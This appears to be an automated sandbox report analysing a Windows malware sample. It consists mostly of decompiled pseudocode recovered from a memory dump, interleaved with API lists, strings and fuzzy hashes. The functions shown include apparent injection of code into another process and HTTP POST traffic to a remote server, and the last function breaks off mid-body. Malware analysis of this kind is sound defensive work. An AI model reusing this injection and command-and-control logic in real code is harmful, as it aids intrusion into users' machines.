Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
SysFreeString.OLEAUT32(?), ref: 0008DF82
SysFreeString.OLEAUT32(?), ref: 0008DF8B

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Strings

FALSE, xrefs: 0008DDAE
TRUE, xrefs: 0008DDA7

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: da1604a6fd772287a782f22ab30a7fe99dcadaddd4b82691ca7b1ab925f09ca2
Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
Opcode Fuzzy Hash: da1604a6fd772287a782f22ab30a7fe99dcadaddd4b82691ca7b1ab925f09ca2
Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008C6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0x9e688; // 0xb0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E0008E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0x9e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0x9e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0x9e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E00088669( *0x9e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0x9e684; // 0x28df8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0x9e684; // 0x28df8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E0008861A( &_v32, 0x1ac4);
					_t141 =  *0x9e688; // 0xb0000
					 *0x9e688 = _t131;
					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E0008C63F(_v12, _v8, _v36);
					 *0x9e688 = _t141;
					goto L14;
				}
			}

APIs

RegisterClassExA.USER32 ref: 0008C785
CreateWindowExA.USER32 ref: 0008C7B0
DestroyWindow.USER32 ref: 0008C7BB
UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Strings

cdcdwqwqwq, xrefs: 0008C76A
0, xrefs: 0008C74D
sadccdcdsasa, xrefs: 0008C73E

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 3082384575-2319545179
Opcode ID: 8bb081a5582da799488192e2f74a1ae18185b5fa3b829c330fd2e48e9cfd5350
Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
Opcode Fuzzy Hash: 8bb081a5582da799488192e2f74a1ae18185b5fa3b829c330fd2e48e9cfd5350
Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00085F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000885EF();
				_t19 = E0008980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E00088F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x9e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000895C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000885C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E00092A5B( *0x9e69c);
						 *_t55 = 0x7c3;
						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000895E1(0x9ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000885D5();
							_v8 = 0;
							_t37 =  *0x9e684; // 0x28df8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
							 *0x9e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000885D5();
					}
					goto L10;
				}
			}

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
SetLastError.KERNEL32(000000AA), ref: 000860D7

Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8

Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839

GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
GetLastError.KERNEL32 ref: 00085FEF
memset.MSVCRT ref: 00086013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
GetFileAttributesW.KERNEL32(00000000), ref: 00086083

Strings

Hello qqq, xrefs: 00085F8D

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 1203100507-3610097158
Opcode ID: 6c4e10b46dcdce25dcf17f39e375e9fff7939ad34e1c600105cf40c827e96d10
Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
Opcode Fuzzy Hash: 6c4e10b46dcdce25dcf17f39e375e9fff7939ad34e1c600105cf40c827e96d10
Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21

Uniqueness

Uniqueness Score: -1.00%

Function 0008E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000895C7(0x85b);
				_v60 = E000895C7(0xdc9);
				_v56 = E000895C7(0x65d);
				_v52 = E000895C7(0xdd3);
				_t105 = E000895C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0008C379(_t214));
				_t113 =  *0x9e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x9e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x9e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x9e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x9e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x9e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x9e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E0008980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x9e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E0008980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000895C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x9e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
										E000885C2( &_v12);
										if(_a24 != 0) {
											E0008980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x9e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E00089749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x9e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x9e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x9e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x9e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x9e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x9e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x9e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x9e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

APIs

memset.MSVCRT ref: 0008E69A
memset.MSVCRT ref: 0008E6AB
memset.MSVCRT ref: 0008E700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0008E785

Strings

POST, xrefs: 0008E84B

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000916B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E000916B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701

Strings

CryptGenRandom, xrefs: 000916EC
CryptReleaseContext, xrefs: 000916FB
CryptAcquireContextA, xrefs: 000916DD
advapi32.dll, xrefs: 000916C3

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764

Uniqueness

Uniqueness Score: -1.00%

Function 00092122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L00092285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000922CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E00088706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x909b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

APIs

_snprintf.MSVCRT ref: 00092146
localeconv.MSVCRT ref: 00092161
strchr.MSVCRT ref: 00092173
strchr.MSVCRT ref: 00092184
strchr.MSVCRT ref: 00092192
strchr.MSVCRT ref: 000921B7

Strings

%.*g, xrefs: 0009213D

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0

Uniqueness

Uniqueness Score: -1.00%

Function 000902B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 00090332
qsort.MSVCRT ref: 000905B0

Strings

%I64d, xrefs: 00090324
true, xrefs: 00090309
false, xrefs: 00090315
null, xrefs: 000902F7

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00084A0B, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x9e688; // 0xb0000
					_t125 =  *0x9e68c; // 0x28dfab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E0008BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E0008B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E0008B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
					E0008B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000892E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000891E3(_v1112);
								_t145 = _t130;
								 *0x9e740 = _t76;
								 *0x9e738 = E000891E3(_t145);
								L17:
								_push(_t145);
								_t188 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x9b9ca);
								E00089F48(0xe);
								E00089F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E0008A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E0008A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E0008A3ED(_t188, _t180, _t208);
								}
								_t87 = E0008980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E0008A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E0008E23E(_t183);
										}
										E000852C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
